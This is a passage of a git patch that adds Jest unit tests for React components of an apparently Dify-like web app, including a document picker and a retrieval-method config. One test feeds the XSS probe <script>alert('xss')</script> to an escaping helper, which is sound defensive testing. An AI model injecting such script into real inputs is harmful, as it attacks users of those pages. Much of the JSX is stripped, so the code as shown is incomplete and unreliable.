expect.arrayContaining([ + expect.objectContaining({ label: 'API Var' }), + ]), + ) + }) + + it('should handle missing hide and required properties', () => { + const promptVariables: Partial[] = [ + { key: 'no-hide', name: 'No Hide', type: 'string', required: true }, + { key: 'no-required', name: 'No Required', type: 'number', hide: true }, + ] + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(promptVariables as PromptVariableWithMeta[]), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + expect(capturedChatInputProps?.inputsForm).toEqual([ + expect.objectContaining({ + label: 'No Hide', + variable: 'no-hide', + hide: false, // Should default to false + required: true, + }), + expect.objectContaining({ + label: 'No Required', + variable: 'no-required', + hide: true, + required: false, // Should default to false + }), + ]) + }) + + it('should preserve original hide and required values', () => { + const promptVariables: PromptVariableWithMeta[] = [ + { key: 'hidden-optional', name: 'Hidden Optional', type: 'string', hide: true, required: false }, + { key: 'visible-required', name: 'Visible Required', type: 'number', hide: false, required: true }, + ] + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(promptVariables), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + expect(capturedChatInputProps?.inputsForm).toEqual([ + expect.objectContaining({ + label: 'Hidden Optional', + variable: 'hidden-optional', + hide: true, + required: false, + }), + expect.objectContaining({ + label: 'Visible Required', + variable: 'visible-required', + hide: false, + required: true, + }), + ]) + }) + }) + describe('chat input rendering', () => { it('should render chat input in chat mode with transformed prompt variables and feature handler', () => { // Arrange @@ -326,6 +538,43 @@ describe('DebugWithMultipleModel', () => { }) }) + describe('performance optimization', () => { + it('should memoize callback functions correctly', () => { + const props = createProps({ multipleModelConfigs: [createModelAndParameter()] }) + const { rerender } = renderComponent(props) + + // First render + const firstItems = screen.getAllByTestId('debug-item') + expect(firstItems).toHaveLength(1) + + // Rerender with exactly same props - should not cause re-renders + rerender() + + const secondItems = screen.getAllByTestId('debug-item') + expect(secondItems).toHaveLength(1) + + // Check that the element still renders the same content + expect(firstItems[0]).toHaveTextContent(secondItems[0].textContent || '') + }) + + it('should recalculate size and position when number of models changes', () => { + const { rerender } = renderComponent({ multipleModelConfigs: [createModelAndParameter()] }) + + // Single model - no special sizing + const singleItem = screen.getByTestId('debug-item') + expect(singleItem.style.width).toBe('') + + // Change to 2 models + rerender() + + const twoItems = screen.getAllByTestId('debug-item') + expect(twoItems[0].style.width).toBe('calc(50% - 4px - 24px)') + expect(twoItems[1].style.width).toBe('calc(50% - 4px - 24px)') + }) + }) + describe('layout sizing and positioning', () => { const expectItemLayout = ( element: HTMLElement, From 23f75a1185b2924249d53825b59014298a870f1b Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 21:18:58 +0800 Subject: [PATCH 36/68] chore: some tests for configuration components (#29653) Co-authored-by: yyh <92089059+lyzno1@users.noreply.github.com> --- .../base/group-name/index.spec.tsx | 21 +++++ .../base/operation-btn/index.spec.tsx | 76 +++++++++++++++++++ .../base/var-highlight/index.spec.tsx | 62 +++++++++++++++ .../ctrl-btn-group/index.spec.tsx | 48 ++++++++++++ .../configuration/ctrl-btn-group/index.tsx | 4 +- 5 files changed, 209 insertions(+), 2 deletions(-) create mode 100644 web/app/components/app/configuration/base/group-name/index.spec.tsx create mode 100644 web/app/components/app/configuration/base/operation-btn/index.spec.tsx create mode 100644 web/app/components/app/configuration/base/var-highlight/index.spec.tsx create mode 100644 web/app/components/app/configuration/ctrl-btn-group/index.spec.tsx diff --git a/web/app/components/app/configuration/base/group-name/index.spec.tsx b/web/app/components/app/configuration/base/group-name/index.spec.tsx new file mode 100644 index 0000000000..ac504247f2 --- /dev/null +++ b/web/app/components/app/configuration/base/group-name/index.spec.tsx @@ -0,0 +1,21 @@ +import { render, screen } from '@testing-library/react' +import GroupName from './index' + +describe('GroupName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render name when provided', () => { + // Arrange + const title = 'Inputs' + + // Act + render() + + // Assert + expect(screen.getByText(title)).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.spec.tsx b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx new file mode 100644 index 0000000000..b504bdcfe7 --- /dev/null +++ b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx @@ -0,0 +1,76 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import OperationBtn from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +jest.mock('@remixicon/react', () => ({ + RiAddLine: (props: { className?: string }) => ( + + ), + RiEditLine: (props: { className?: string }) => ( + + ), +})) + +describe('OperationBtn', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering icons and translation labels + describe('Rendering', () => { + it('should render passed custom class when provided', () => { + // Arrange + const customClass = 'custom-class' + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.add').parentElement).toHaveClass(customClass) + }) + it('should render add icon when type is add', () => { + // Arrange + const onClick = jest.fn() + + // Act + render() + + // Assert + expect(screen.getByTestId('add-icon')).toBeInTheDocument() + expect(screen.getByText('common.operation.add')).toBeInTheDocument() + }) + + it('should render edit icon when provided', () => { + // Arrange + const actionName = 'Rename' + + // Act + render() + + // Assert + expect(screen.getByTestId('edit-icon')).toBeInTheDocument() + expect(screen.queryByTestId('add-icon')).toBeNull() + expect(screen.getByText(actionName)).toBeInTheDocument() + }) + }) + + // Click handling + describe('Interactions', () => { + it('should execute click handler when button is clicked', () => { + // Arrange + const onClick = jest.fn() + render() + + // Act + fireEvent.click(screen.getByText('common.operation.add')) + + // Assert + expect(onClick).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/configuration/base/var-highlight/index.spec.tsx b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx new file mode 100644 index 0000000000..9e84aa09ac --- /dev/null +++ b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx @@ -0,0 +1,62 @@ +import { render, screen } from '@testing-library/react' +import VarHighlight, { varHighlightHTML } from './index' + +describe('VarHighlight', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering highlighted variable tags + describe('Rendering', () => { + it('should render braces around the variable name with default styles', () => { + // Arrange + const props = { name: 'userInput' } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText('userInput')).toBeInTheDocument() + expect(screen.getAllByText('{{')[0]).toBeInTheDocument() + expect(screen.getAllByText('}}')[0]).toBeInTheDocument() + expect(container.firstChild).toHaveClass('item') + }) + + it('should apply custom class names when provided', () => { + // Arrange + const props = { name: 'custom', className: 'mt-2' } + + // Act + const { container } = render() + + // Assert + expect(container.firstChild).toHaveClass('mt-2') + }) + }) + + // Escaping HTML via helper + describe('varHighlightHTML', () => { + it('should escape dangerous characters before returning HTML string', () => { + // Arrange + const props = { name: '' } + + // Act + const html = varHighlightHTML(props) + + // Assert + expect(html).toContain('<script>alert('xss')</script>') + expect(html).not.toContain('' + renderComponent({ + value: { + name: specialName, + extension: 'txt', + chunkingMode: ChunkingMode.text, + }, + }) + + // React should escape the text + expect(screen.getByText(specialName)).toBeInTheDocument() + }) + + it('should handle documents with missing extension in data_source_detail_dict', () => { + const docWithEmptyExtension = createMockDocument({ + id: 'doc-empty-ext', + name: 'Doc Empty Ext', + data_source_detail_dict: { + upload_file: { + name: 'file-no-ext', + extension: '', + }, + }, + }) + mockDocumentListData = { data: [docWithEmptyExtension] } + + // Component should handle mapping documents with empty extension + renderComponent() + + // Should not crash + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle document list mapping with various data_source_detail_dict states', () => { + // Test the mapping logic: d.data_source_detail_dict?.upload_file?.extension || '' + const docs = [ + createMockDocument({ + id: 'doc-1', + name: 'With Extension', + data_source_detail_dict: { + upload_file: { name: 'file.pdf', extension: 'pdf' }, + }, + }), + createMockDocument({ + id: 'doc-2', + name: 'Without Detail Dict', + data_source_detail_dict: undefined, + }), + ] + mockDocumentListData = { data: docs } + + renderComponent() + + // Should not crash during mapping + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + // Tests for all prop variations + describe('Prop Variations', () => { + describe('datasetId variations', () => { + it('should handle empty datasetId', () => { + renderComponent({ datasetId: '' }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle UUID format datasetId', () => { + renderComponent({ datasetId: '123e4567-e89b-12d3-a456-426614174000' }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + describe('value.chunkingMode variations', () => { + const chunkingModes = [ + { mode: ChunkingMode.text, label: 'dataset.chunkingMode.general' }, + { mode: ChunkingMode.qa, label: 'dataset.chunkingMode.qa' }, + { mode: ChunkingMode.parentChild, label: 'dataset.chunkingMode.parentChild' }, + ] + + test.each(chunkingModes)( + 'should display correct label for $mode mode', + ({ mode, label }) => { + renderComponent({ + value: { + name: 'Test', + extension: 'txt', + chunkingMode: mode, + parentMode: mode === ChunkingMode.parentChild ? 'paragraph' : undefined, + }, + }) + + expect(screen.getByText(new RegExp(label))).toBeInTheDocument() + }, + ) + }) + + describe('value.parentMode variations', () => { + const parentModes: Array<{ mode: ParentMode; label: string }> = [ + { mode: 'paragraph', label: 'dataset.parentMode.paragraph' }, + { mode: 'full-doc', label: 'dataset.parentMode.fullDoc' }, + ] + + test.each(parentModes)( + 'should display correct label for $mode parentMode', + ({ mode, label }) => { + renderComponent({ + value: { + name: 'Test', + extension: 'txt', + chunkingMode: ChunkingMode.parentChild, + parentMode: mode, + }, + }) + + expect(screen.getByText(new RegExp(label))).toBeInTheDocument() + }, + ) + }) + + describe('value.extension variations', () => { + const extensions = ['txt', 'pdf', 'docx', 'xlsx', 'csv', 'md', 'html'] + + test.each(extensions)('should handle %s extension', (ext) => { + renderComponent({ + value: { + name: `File.${ext}`, + extension: ext, + chunkingMode: ChunkingMode.text, + }, + }) + + expect(screen.getByText(`File.${ext}`)).toBeInTheDocument() + }) + }) + }) + + // Tests for document selection + describe('Document Selection', () => { + it('should fetch documents list via useDocumentList', () => { + const mockDoc = createMockDocument({ + id: 'selected-doc', + name: 'Selected Document', + }) + mockDocumentListData = { data: [mockDoc] } + const onChange = jest.fn() + + renderComponent({ onChange }) + + // Verify the hook was called + const { useDocumentList } = jest.requireMock('@/service/knowledge/use-document') + expect(useDocumentList).toHaveBeenCalled() + }) + + it('should call onChange when document is selected', () => { + const docs = createMockDocumentList(3) + mockDocumentListData = { data: docs } + const onChange = jest.fn() + + renderComponent({ onChange }) + + // Click on a document in the list + fireEvent.click(screen.getByText('Document 2')) + + // handleChange should find the document and call onChange with full document + expect(onChange).toHaveBeenCalledTimes(1) + expect(onChange).toHaveBeenCalledWith(docs[1]) + }) + + it('should map document list items correctly', () => { + const docs = createMockDocumentList(3) + mockDocumentListData = { data: docs } + + renderComponent() + + // Documents should be rendered in the list + expect(screen.getByText('Document 1')).toBeInTheDocument() + expect(screen.getByText('Document 2')).toBeInTheDocument() + expect(screen.getByText('Document 3')).toBeInTheDocument() + }) + }) + + // Tests for integration with child components + describe('Child Component Integration', () => { + it('should pass correct data to DocumentList when popup is open', () => { + const docs = createMockDocumentList(3) + mockDocumentListData = { data: docs } + + renderComponent() + + // DocumentList receives mapped documents: { id, name, extension } + // We verify the data is fetched + const { useDocumentList } = jest.requireMock('@/service/knowledge/use-document') + expect(useDocumentList).toHaveBeenCalled() + }) + + it('should map document data_source_detail_dict extension correctly', () => { + const doc = createMockDocument({ + id: 'mapped-doc', + name: 'Mapped Document', + data_source_detail_dict: { + upload_file: { + name: 'mapped.pdf', + extension: 'pdf', + }, + }, + }) + mockDocumentListData = { data: [doc] } + + renderComponent() + + // The mapping: d.data_source_detail_dict?.upload_file?.extension || '' + // Should extract 'pdf' from the document + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should render trigger with SearchInput integration', () => { + renderComponent() + + // The trigger is always rendered + expect(screen.getByTestId('portal-trigger')).toBeInTheDocument() + }) + + it('should integrate FileIcon component', () => { + // Use empty document list to avoid duplicate icons from list + mockDocumentListData = { data: [] } + + renderComponent({ + value: { + name: 'test.pdf', + extension: 'pdf', + chunkingMode: ChunkingMode.text, + }, + }) + + // FileIcon should be rendered via DocumentFileIcon - pdf renders pdf icon + expect(screen.getByTestId('file-pdf-icon')).toBeInTheDocument() + }) + }) + + // Tests for visual states + describe('Visual States', () => { + it('should apply hover styles on trigger', () => { + renderComponent() + + const trigger = screen.getByTestId('portal-trigger') + const clickableDiv = trigger.querySelector('div') + + expect(clickableDiv).toHaveClass('hover:bg-state-base-hover') + }) + + it('should render portal content for document selection', () => { + renderComponent() + + // Portal content is rendered in our mock for testing + expect(screen.getByTestId('portal-content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx b/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx new file mode 100644 index 0000000000..e6900d23db --- /dev/null +++ b/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx @@ -0,0 +1,641 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import type { DocumentItem } from '@/models/datasets' +import PreviewDocumentPicker from './preview-document-picker' + +// Mock react-i18next +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string, params?: Record) => { + if (key === 'dataset.preprocessDocument' && params?.num) + return `${params.num} files` + + return key + }, + }), +})) + +// Mock portal-to-follow-elem - always render content for testing +jest.mock('@/app/components/base/portal-to-follow-elem', () => ({ + PortalToFollowElem: ({ children, open }: { + children: React.ReactNode + open?: boolean + }) => ( +
+ {children} +
+ ), + PortalToFollowElemTrigger: ({ children, onClick }: { + children: React.ReactNode + onClick?: () => void + }) => ( +
+ {children} +
+ ), + // Always render content to allow testing document selection + PortalToFollowElemContent: ({ children, className }: { + children: React.ReactNode + className?: string + }) => ( +
+ {children} +
+ ), +})) + +// Mock icons +jest.mock('@remixicon/react', () => ({ + RiArrowDownSLine: () => , + RiFile3Fill: () => 📄, + RiFileCodeFill: () => 📄, + RiFileExcelFill: () => 📄, + RiFileGifFill: () => 📄, + RiFileImageFill: () => 📄, + RiFileMusicFill: () => 📄, + RiFilePdf2Fill: () => 📄, + RiFilePpt2Fill: () => 📄, + RiFileTextFill: () => 📄, + RiFileVideoFill: () => 📄, + RiFileWordFill: () => 📄, + RiMarkdownFill: () => 📄, +})) + +// Factory function to create mock DocumentItem +const createMockDocumentItem = (overrides: Partial = {}): DocumentItem => ({ + id: `doc-${Math.random().toString(36).substr(2, 9)}`, + name: 'Test Document', + extension: 'txt', + ...overrides, +}) + +// Factory function to create multiple document items +const createMockDocumentList = (count: number): DocumentItem[] => { + return Array.from({ length: count }, (_, index) => + createMockDocumentItem({ + id: `doc-${index + 1}`, + name: `Document ${index + 1}`, + extension: index % 2 === 0 ? 'pdf' : 'txt', + }), + ) +} + +// Factory function to create default props +const createDefaultProps = (overrides: Partial> = {}) => ({ + value: createMockDocumentItem({ id: 'selected-doc', name: 'Selected Document' }), + files: createMockDocumentList(3), + onChange: jest.fn(), + ...overrides, +}) + +// Helper to render component with default props +const renderComponent = (props: Partial> = {}) => { + const defaultProps = createDefaultProps(props) + return { + ...render(), + props: defaultProps, + } +} + +describe('PreviewDocumentPicker', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Tests for basic rendering + describe('Rendering', () => { + it('should render without crashing', () => { + renderComponent() + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should render document name from value prop', () => { + renderComponent({ + value: createMockDocumentItem({ name: 'My Document' }), + }) + + expect(screen.getByText('My Document')).toBeInTheDocument() + }) + + it('should render placeholder when name is empty', () => { + renderComponent({ + value: createMockDocumentItem({ name: '' }), + }) + + expect(screen.getByText('--')).toBeInTheDocument() + }) + + it('should render placeholder when name is undefined', () => { + renderComponent({ + value: { id: 'doc-1', extension: 'txt' } as DocumentItem, + }) + + expect(screen.getByText('--')).toBeInTheDocument() + }) + + it('should render arrow icon', () => { + renderComponent() + + expect(screen.getByTestId('arrow-icon')).toBeInTheDocument() + }) + + it('should render file icon', () => { + renderComponent({ + value: createMockDocumentItem({ extension: 'txt' }), + files: [], // Use empty files to avoid duplicate icons + }) + + expect(screen.getByTestId('file-text-icon')).toBeInTheDocument() + }) + + it('should render pdf icon for pdf extension', () => { + renderComponent({ + value: createMockDocumentItem({ extension: 'pdf' }), + files: [], // Use empty files to avoid duplicate icons + }) + + expect(screen.getByTestId('file-pdf-icon')).toBeInTheDocument() + }) + }) + + // Tests for props handling + describe('Props', () => { + it('should accept required props', () => { + const props = createDefaultProps() + render() + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should apply className to trigger element', () => { + renderComponent({ className: 'custom-class' }) + + const trigger = screen.getByTestId('portal-trigger') + const innerDiv = trigger.querySelector('.custom-class') + expect(innerDiv).toBeInTheDocument() + }) + + it('should handle empty files array', () => { + // Component should render without crashing with empty files + renderComponent({ files: [] }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle single file', () => { + // Component should accept single file + renderComponent({ + files: [createMockDocumentItem({ id: 'single-doc', name: 'Single File' })], + }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle multiple files', () => { + // Component should accept multiple files + renderComponent({ + files: createMockDocumentList(5), + }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should use value.extension for file icon', () => { + renderComponent({ + value: createMockDocumentItem({ name: 'test.docx', extension: 'docx' }), + }) + + expect(screen.getByTestId('file-word-icon')).toBeInTheDocument() + }) + }) + + // Tests for state management + describe('State Management', () => { + it('should initialize with popup closed', () => { + renderComponent() + + expect(screen.getByTestId('portal-elem')).toHaveAttribute('data-open', 'false') + }) + + it('should toggle popup when trigger is clicked', () => { + renderComponent() + + const trigger = screen.getByTestId('portal-trigger') + fireEvent.click(trigger) + + expect(trigger).toBeInTheDocument() + }) + + it('should render portal content for document selection', () => { + renderComponent() + + // Portal content is always rendered in our mock for testing + expect(screen.getByTestId('portal-content')).toBeInTheDocument() + }) + }) + + // Tests for callback stability and memoization + describe('Callback Stability', () => { + it('should maintain stable onChange callback when value changes', () => { + const onChange = jest.fn() + const value1 = createMockDocumentItem({ id: 'doc-1', name: 'Doc 1' }) + const value2 = createMockDocumentItem({ id: 'doc-2', name: 'Doc 2' }) + + const { rerender } = render( + , + ) + + rerender( + , + ) + + expect(screen.getByText('Doc 2')).toBeInTheDocument() + }) + + it('should use updated onChange callback after rerender', () => { + const onChange1 = jest.fn() + const onChange2 = jest.fn() + const value = createMockDocumentItem() + const files = createMockDocumentList(3) + + const { rerender } = render( + , + ) + + rerender( + , + ) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + // Tests for component memoization + describe('Component Memoization', () => { + it('should be wrapped with React.memo', () => { + expect((PreviewDocumentPicker as any).$$typeof).toBeDefined() + }) + + it('should not re-render when props are the same', () => { + const onChange = jest.fn() + const value = createMockDocumentItem() + const files = createMockDocumentList(3) + + const { rerender } = render( + , + ) + + rerender( + , + ) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + // Tests for user interactions + describe('User Interactions', () => { + it('should toggle popup when trigger is clicked', () => { + renderComponent() + + const trigger = screen.getByTestId('portal-trigger') + fireEvent.click(trigger) + + expect(trigger).toBeInTheDocument() + }) + + it('should render document list with files', () => { + const files = createMockDocumentList(3) + renderComponent({ files }) + + // Documents should be visible in the list + expect(screen.getByText('Document 1')).toBeInTheDocument() + expect(screen.getByText('Document 2')).toBeInTheDocument() + expect(screen.getByText('Document 3')).toBeInTheDocument() + }) + + it('should call onChange when document is selected', () => { + const onChange = jest.fn() + const files = createMockDocumentList(3) + + renderComponent({ files, onChange }) + + // Click on a document + fireEvent.click(screen.getByText('Document 2')) + + // handleChange should call onChange with the selected item + expect(onChange).toHaveBeenCalledTimes(1) + expect(onChange).toHaveBeenCalledWith(files[1]) + }) + + it('should handle rapid toggle clicks', () => { + renderComponent() + + const trigger = screen.getByTestId('portal-trigger') + + // Rapid clicks + fireEvent.click(trigger) + fireEvent.click(trigger) + fireEvent.click(trigger) + fireEvent.click(trigger) + + expect(trigger).toBeInTheDocument() + }) + }) + + // Tests for edge cases + describe('Edge Cases', () => { + it('should handle null value properties gracefully', () => { + renderComponent({ + value: { id: 'doc-1', name: '', extension: '' }, + }) + + expect(screen.getByText('--')).toBeInTheDocument() + }) + + it('should handle empty files array', () => { + renderComponent({ files: [] }) + + // Component should render without crashing + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle very long document names', () => { + const longName = 'A'.repeat(500) + renderComponent({ + value: createMockDocumentItem({ name: longName }), + }) + + expect(screen.getByText(longName)).toBeInTheDocument() + }) + + it('should handle special characters in document name', () => { + const specialName = '' + renderComponent({ + value: createMockDocumentItem({ name: specialName }), + }) + + expect(screen.getByText(specialName)).toBeInTheDocument() + }) + + it('should handle undefined files prop', () => { + // Test edge case where files might be undefined at runtime + const props = createDefaultProps() + // @ts-expect-error - Testing runtime edge case + props.files = undefined + + render() + + // Component should render without crashing + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle large number of files', () => { + const manyFiles = createMockDocumentList(100) + renderComponent({ files: manyFiles }) + + // Component should accept large files array + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle files with same name but different extensions', () => { + const files = [ + createMockDocumentItem({ id: 'doc-1', name: 'document', extension: 'pdf' }), + createMockDocumentItem({ id: 'doc-2', name: 'document', extension: 'txt' }), + ] + renderComponent({ files }) + + // Component should handle duplicate names + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + // Tests for prop variations + describe('Prop Variations', () => { + describe('value variations', () => { + it('should handle value with all fields', () => { + renderComponent({ + value: { + id: 'full-doc', + name: 'Full Document', + extension: 'pdf', + }, + }) + + expect(screen.getByText('Full Document')).toBeInTheDocument() + }) + + it('should handle value with minimal fields', () => { + renderComponent({ + value: { id: 'minimal', name: '', extension: '' }, + }) + + expect(screen.getByText('--')).toBeInTheDocument() + }) + }) + + describe('files variations', () => { + it('should handle single file', () => { + renderComponent({ + files: [createMockDocumentItem({ name: 'Single' })], + }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle two files', () => { + renderComponent({ + files: createMockDocumentList(2), + }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle many files', () => { + renderComponent({ + files: createMockDocumentList(50), + }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + describe('className variations', () => { + it('should apply custom className', () => { + renderComponent({ className: 'my-custom-class' }) + + const trigger = screen.getByTestId('portal-trigger') + expect(trigger.querySelector('.my-custom-class')).toBeInTheDocument() + }) + + it('should work without className', () => { + renderComponent({ className: undefined }) + + expect(screen.getByTestId('portal-trigger')).toBeInTheDocument() + }) + + it('should handle multiple class names', () => { + renderComponent({ className: 'class-one class-two' }) + + const trigger = screen.getByTestId('portal-trigger') + const element = trigger.querySelector('.class-one') + expect(element).toBeInTheDocument() + expect(element).toHaveClass('class-two') + }) + }) + + describe('extension variations', () => { + const extensions = [ + { ext: 'txt', icon: 'file-text-icon' }, + { ext: 'pdf', icon: 'file-pdf-icon' }, + { ext: 'docx', icon: 'file-word-icon' }, + { ext: 'xlsx', icon: 'file-excel-icon' }, + { ext: 'md', icon: 'file-markdown-icon' }, + ] + + test.each(extensions)('should render correct icon for $ext extension', ({ ext, icon }) => { + renderComponent({ + value: createMockDocumentItem({ extension: ext }), + files: [], // Use empty files to avoid duplicate icons + }) + + expect(screen.getByTestId(icon)).toBeInTheDocument() + }) + }) + }) + + // Tests for document list rendering + describe('Document List Rendering', () => { + it('should render all documents in the list', () => { + const files = createMockDocumentList(5) + renderComponent({ files }) + + // All documents should be visible + files.forEach((file) => { + expect(screen.getByText(file.name)).toBeInTheDocument() + }) + }) + + it('should pass onChange handler to DocumentList', () => { + const onChange = jest.fn() + const files = createMockDocumentList(3) + + renderComponent({ files, onChange }) + + // Click on first document + fireEvent.click(screen.getByText('Document 1')) + + expect(onChange).toHaveBeenCalledWith(files[0]) + }) + + it('should show count header only for multiple files', () => { + // Single file - no header + const { rerender } = render( + , + ) + expect(screen.queryByText(/files/)).not.toBeInTheDocument() + + // Multiple files - show header + rerender( + , + ) + expect(screen.getByText('3 files')).toBeInTheDocument() + }) + }) + + // Tests for visual states + describe('Visual States', () => { + it('should apply hover styles on trigger', () => { + renderComponent() + + const trigger = screen.getByTestId('portal-trigger') + const innerDiv = trigger.querySelector('.hover\\:bg-state-base-hover') + expect(innerDiv).toBeInTheDocument() + }) + + it('should have truncate class for long names', () => { + renderComponent({ + value: createMockDocumentItem({ name: 'Very Long Document Name' }), + }) + + const nameElement = screen.getByText('Very Long Document Name') + expect(nameElement).toHaveClass('truncate') + }) + + it('should have max-width on name element', () => { + renderComponent({ + value: createMockDocumentItem({ name: 'Test' }), + }) + + const nameElement = screen.getByText('Test') + expect(nameElement).toHaveClass('max-w-[200px]') + }) + }) + + // Tests for handleChange callback + describe('handleChange Callback', () => { + it('should call onChange with selected document item', () => { + const onChange = jest.fn() + const files = createMockDocumentList(3) + + renderComponent({ files, onChange }) + + // Click first document + fireEvent.click(screen.getByText('Document 1')) + + expect(onChange).toHaveBeenCalledWith(files[0]) + }) + + it('should handle different document items in files', () => { + const onChange = jest.fn() + const customFiles = [ + { id: 'custom-1', name: 'Custom File 1', extension: 'pdf' }, + { id: 'custom-2', name: 'Custom File 2', extension: 'txt' }, + ] + + renderComponent({ files: customFiles, onChange }) + + // Click on first custom file + fireEvent.click(screen.getByText('Custom File 1')) + expect(onChange).toHaveBeenCalledWith(customFiles[0]) + + // Click on second custom file + fireEvent.click(screen.getByText('Custom File 2')) + expect(onChange).toHaveBeenCalledWith(customFiles[1]) + }) + + it('should work with multiple sequential selections', () => { + const onChange = jest.fn() + const files = createMockDocumentList(3) + + renderComponent({ files, onChange }) + + // Select multiple documents sequentially + fireEvent.click(screen.getByText('Document 1')) + fireEvent.click(screen.getByText('Document 3')) + fireEvent.click(screen.getByText('Document 2')) + + expect(onChange).toHaveBeenCalledTimes(3) + expect(onChange).toHaveBeenNthCalledWith(1, files[0]) + expect(onChange).toHaveBeenNthCalledWith(2, files[2]) + expect(onChange).toHaveBeenNthCalledWith(3, files[1]) + }) + }) +}) diff --git a/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx b/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx new file mode 100644 index 0000000000..be509f1c6e --- /dev/null +++ b/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx @@ -0,0 +1,912 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import type { RetrievalConfig } from '@/types/app' +import { RETRIEVE_METHOD } from '@/types/app' +import { + DEFAULT_WEIGHTED_SCORE, + RerankingModeEnum, + WeightedScoreEnum, +} from '@/models/datasets' +import RetrievalMethodConfig from './index' + +// Mock react-i18next +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +// Mock provider context with controllable supportRetrievalMethods +let mockSupportRetrievalMethods: RETRIEVE_METHOD[] = [ + RETRIEVE_METHOD.semantic, + RETRIEVE_METHOD.fullText, + RETRIEVE_METHOD.hybrid, +] + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + supportRetrievalMethods: mockSupportRetrievalMethods, + }), +})) + +// Mock model hooks with controllable return values +let mockRerankDefaultModel: { provider: { provider: string }; model: string } | undefined = { + provider: { provider: 'test-provider' }, + model: 'test-rerank-model', +} +let mockIsRerankDefaultModelValid: boolean | undefined = true + +jest.mock('@/app/components/header/account-setting/model-provider-page/hooks', () => ({ + useModelListAndDefaultModelAndCurrentProviderAndModel: () => ({ + defaultModel: mockRerankDefaultModel, + currentModel: mockIsRerankDefaultModelValid, + }), +})) + +// Mock child component RetrievalParamConfig to simplify testing +jest.mock('../retrieval-param-config', () => ({ + __esModule: true, + default: ({ type, value, onChange, showMultiModalTip }: { + type: RETRIEVE_METHOD + value: RetrievalConfig + onChange: (v: RetrievalConfig) => void + showMultiModalTip?: boolean + }) => ( +
+ {type} + {String(showMultiModalTip)} + +
+ ), +})) + +// Factory function to create mock RetrievalConfig +const createMockRetrievalConfig = (overrides: Partial = {}): RetrievalConfig => ({ + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: false, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + top_k: 4, + score_threshold_enabled: false, + score_threshold: 0.5, + ...overrides, +}) + +// Helper to render component with default props +const renderComponent = (props: Partial> = {}) => { + const defaultProps = { + value: createMockRetrievalConfig(), + onChange: jest.fn(), + } + return render() +} + +describe('RetrievalMethodConfig', () => { + beforeEach(() => { + jest.clearAllMocks() + // Reset mock values to defaults + mockSupportRetrievalMethods = [ + RETRIEVE_METHOD.semantic, + RETRIEVE_METHOD.fullText, + RETRIEVE_METHOD.hybrid, + ] + mockRerankDefaultModel = { + provider: { provider: 'test-provider' }, + model: 'test-rerank-model', + } + mockIsRerankDefaultModelValid = true + }) + + // Tests for basic rendering + describe('Rendering', () => { + it('should render without crashing', () => { + renderComponent() + + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + }) + + it('should render all three retrieval methods when all are supported', () => { + renderComponent() + + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.full_text_search.title')).toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.hybrid_search.title')).toBeInTheDocument() + }) + + it('should render descriptions for all retrieval methods', () => { + 